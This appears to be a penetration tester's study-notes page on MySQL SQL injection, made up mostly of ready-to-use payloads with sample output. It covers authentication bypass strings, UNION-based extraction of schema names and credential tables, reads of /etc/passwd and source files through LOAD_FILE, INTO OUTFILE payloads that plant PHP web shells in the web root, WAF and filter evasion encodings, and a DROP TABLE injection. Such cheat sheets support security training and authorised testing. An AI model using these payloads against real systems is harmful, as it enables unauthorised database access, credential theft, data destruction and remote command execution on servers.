SQL Injection

MySQL (3306)SQLMAP
$searchInput =  $_POST['findUser'];
$query = "select * from logins where username like '%$searchInput'";
$result = $conn->query($query);
select * from logins where username like '%$searchInput'

payload

'%1'; DROP TABLE users;'
select * from logins where username like '%1'; DROP TABLE users;'

return

Error: near line 1: near "'": syntax error

SQLi Discovery

PayloadURL Encoded

'

%27

"

%22

#

%23

;

%3B

)

%29

Authentication Bypass

SELECT * FROM logins WHERE username='admin' AND password = 'p@ssw0rd';
admin' or '1'='1
SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
LogoPayloadsAllTheThings/SQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Comments

We can use two types of line comments with MySQL -- and #, in addition to an in-line comment /**/

Auth Bypass with comments

admin'--
SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something';

Put spaces after --

admin')--
SELECT * FROM logins where (username='admin')
user' or id=5 ) --   test
SELECT * FROM logins WHERE (username='user' or id=5 ) -- test' AND id > 1) AND password = '******'

Union

MariaDB [employees]> select * from employees limit 5;
+--------+------------+------------+-------------+--------+------------+
| emp_no | birth_date | first_name | last_name   | gender | hire_date  |
+--------+------------+------------+-------------+--------+------------+
|  10001 | 1953-09-02 | Georgi     | Facello     | M      | 1986-06-26 |
|  10002 | 1952-12-03 | Vivian     | Billawala   | F      | 1986-12-11 |
|  10003 | 1959-06-16 | Temple     | Lukaszewicz | M      | 1992-07-04 |
|  10004 | 1956-11-06 | Masanao    | Rahimi      | M      | 1986-12-16 |
|  10005 | 1962-12-11 | Sanjay     | Danlos      | M      | 1985-08-01 |
+--------+------------+------------+-------------+--------+------------+
5 rows in set (0.038 sec)

MariaDB [employees]> select * from departments limit 5;
+---------+------------------+
| dept_no | dept_name        |
+---------+------------------+
| d009    | Customer Service |
| d005    | Development      |
| d002    | Finance          |
| d003    | Human Resources  |
| d001    | Marketing        |
+---------+------------------+
5 rows in set (0.022 sec)

MariaDB [employees]> select dept_no from departments union select emp_no from employees;
LogoSQL injection UNION attacks | Web Security AcademyWebSecAcademy
LogoSQL Injection Using UNION
LogoNetSPI SQL Injection Wikinetspi

Detect number of columns

Using ORDER BY

LogoNetSPI SQL Injection Wikinetspi
' order by 1-- -
' order by 2-- -

Until we reach a number that returns an error

This means that this table has exactly 4 columns .

cn' UNION select 1,2,3,4-- -

While a query may return multiple columns, the web application may only display some of them. So, if we inject our query in a column that is not printed on the page, we will not get its output. This is why we need to determine which columns are printed to the page, to determine where to place our injection.

We cannot place our injection at the beginning, or its output will not be printed.

cn' UNION select 1,@@version,3,4-- -

Database Enumeration

Fingerprinting

LogoNetSPI SQL Injection Wikinetspi
PayloadWhen to UseExpected OutputWrong Output

SELECT @@version

When we have full query output

MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1'

In MSSQL it returns MSSQL version. Error with other DBMS.

SELECT POW(1,1)

When we only have numeric output

1

Error with other DBMS

SELECT SLEEP(5)

Blind/No Output

Delays page response for 5 seconds and returns 0.

Will not delay response with other DBMS

Database

mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

+--------------------+
| SCHEMA_NAME        |
+--------------------+
| mysql              |
| information_schema |
| performance_schema |
| ilfreight          |
| dev                |
+--------------------+
6 rows in set (0.01 sec)
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Find the current database with the SELECT database() query

cn' UNION select 1,database(),2,3-- -

Tables 

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

Columns 

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Data

Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.

cn' UNION select 1, username, password, 4 from dev.credentials-- -

Reading Files

MySQL (3306)

DB User

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
cn' UNION SELECT 1, user(), 3, 4-- -
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -

User Privileges

SELECT super_priv FROM mysql.user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -

Y = yes, super_priv

If we had many users within the DBMS:

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

Other privileges:

cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

FILE privilege is listed for our user, enabling us to read files and potentially even write files

LOAD_FILE

SELECT LOAD_FILE('/etc/passwd');

Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

Write Files

To be able to write files to the back-end server using a MySQL database, we require three things:

  1. User with FILE privilege enabled

  2. MySQL global secure_file_priv variable not enabled

  3. Write access to the location we want to write to on the back-end server

SHOW VARIABLES LIKE 'secure_file_priv';
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

secure_file_priv value is empty, meaning that we can read/write files to any location.

SELECT * from users INTO OUTFILE '/tmp/credentials';
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

Tip: Advanced file exports utilize the 'FROM_BASE64("base64_data")' function in order to be able to write long/advanced files, including binary data.

Web Shell

Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use load_file to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf, Nginx's configuration at /etc/nginx/nginx.conf, or IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using this wordlist for Linux or this wordlist for Windows. Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Web ShellShell / Reverse Shell

Ressources

https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheetpentestmonkey.net

Payload

More than CPTS

Fragmented SQL Injection - two endpoints

LogoFragmented SQL Injection Attacks – The Solution | InvictiInvicti

Let’s take a look at an instance where the single quote is blacklisted or escaped from the command.

$username ="' or 1=1 --";$password ="qwerty123456";// . . .$query = "SELECT * FROM users WHERE username='".$username."' AND password='".$password."'";select * from users where username='\' or 1=1 -- ' or password='qwerty123456';

As you see in this example, because the single quote (‘) is escaped with a backslash, the payload does not work as intended by the hacker.

username: \password: or 1 # $query = select * from users where username='".$username."' and password='".$password."'";select * from users where username='\' or password=' or 1 # ';

The backslash neutralizes the following single quote. So the value for the username column will end with the single quote that comes right after password= (the end of the gray text). Doing so will eliminate the required password field from the command. Due to the or 1 command, the condition will always return ‘true’. The # (hash) will ignore the rest of the function, and you’ll be able to bypass the login control and login form.

Bypass - WAF / Filters

LogoSQL Injection: Bypassing Common Filters
LogoSQL Injection Bypassing WAF Software Attack | OWASP Foundation
LogoManual SQLi Bypass | Blog | Fluid AttacksFluid Attacks
LogoSQL Injection Cheat Sheet

No Space (%20) - bypass using whitespace alternatives

?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--

No Whitespace - bypass using comments

?id=1/*comment*/and/**/1=1/**/--

No Whitespace - bypass using parenthesis

?id=(1)and(1)=(1)--

No Comma - bypass using OFFSET, FROM and JOIN

LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

Blacklist using keywords - bypass using uppercase/lowercase

?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#

Blacklist using keywords case insensitive - bypass using an equivalent operator

AND   -> &&
OR    -> ||
=     -> LIKE,REGEXP, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING

Information_schema.tables alternative

select * from mysql.innodb_table_stats;
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| database_name  | table_name            | last_update         | n_rows | clustered_index_size | sum_of_other_index_sizes |
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| dvwa           | guestbook             | 2017-01-19 21:02:57 |      0 |                    1 |                        0 |
| dvwa           | users                 | 2017-01-19 21:03:07 |      5 |                    1 |                        0 |
...
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+

mysql> show tables in dvwa;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+

Version alternative

mysql> select @@innodb_version;
+------------------+
| @@innodb_version |
+------------------+
| 5.6.31           |
+------------------+

mysql> select @@version;
+-------------------------+
| @@version               |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+

mysql> mysql> select version();
+-------------------------+
| version()               |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+

Source:

LogoWAF Bypass SQL Injection Payloads - AnyxelAnyxel

Reading / Writing Files

LogoNetSPI SQL Injection Wikinetspi

Requires privileged user

DescriptionQuery

Dump to file

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'

Dump PHP Shell

SELECT 'system($_GET['c']); ?>' INTO OUTFILE '/var/www/shell.php'

Read File

SELECT LOAD_FILE('/etc/passwd')

Read File Obfuscated

SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini

File Privileges

SELECT file_priv FROM mysql.user WHERE user = 'netspi' SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%'

Resources

LogoWhat is SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy
LogoPrevent injection attacks | Veracode Docs

Payload

LogoGitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload ListGitHub
LogoPayloadsAllTheThings/SQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Tools

SQLMAP

PreviousLogin Brute ForceNextXSS

Last updated